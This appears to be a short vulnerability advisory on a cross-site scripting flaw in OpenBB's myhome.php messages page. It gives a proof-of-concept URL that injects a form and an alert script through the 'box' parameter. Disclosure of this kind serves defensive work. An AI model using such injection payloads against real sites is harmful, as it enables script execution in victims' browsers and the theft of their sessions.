OpenBB Cross-Site Scripting Vulnerability

OpenBB Cross-Site Scripting Vulnerability

The following was provided as proof of concept:

http://targetsite/myhome.php?action=messages&box=<form%20name=a><input%20name=i%20value=XSS></form>
<script>alert(document.a.i.value)</script>